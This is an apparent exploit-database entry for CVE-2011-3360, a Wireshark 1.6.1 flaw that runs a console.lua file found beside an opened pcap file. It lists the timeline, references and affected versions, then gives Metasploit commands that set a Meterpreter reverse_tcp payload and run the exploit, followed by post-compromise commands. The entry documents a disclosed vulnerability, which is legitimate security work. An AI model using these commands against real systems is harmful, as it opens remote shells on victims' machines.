Timeline :

Vulnerability discovered and reported to vendor by Haifei Li of MMPC the 2011-07-18
Coordinated release of the vulnerability the 2011-11-15
Metasploit PoC provided the 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there’s a ‘console.lua’ file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo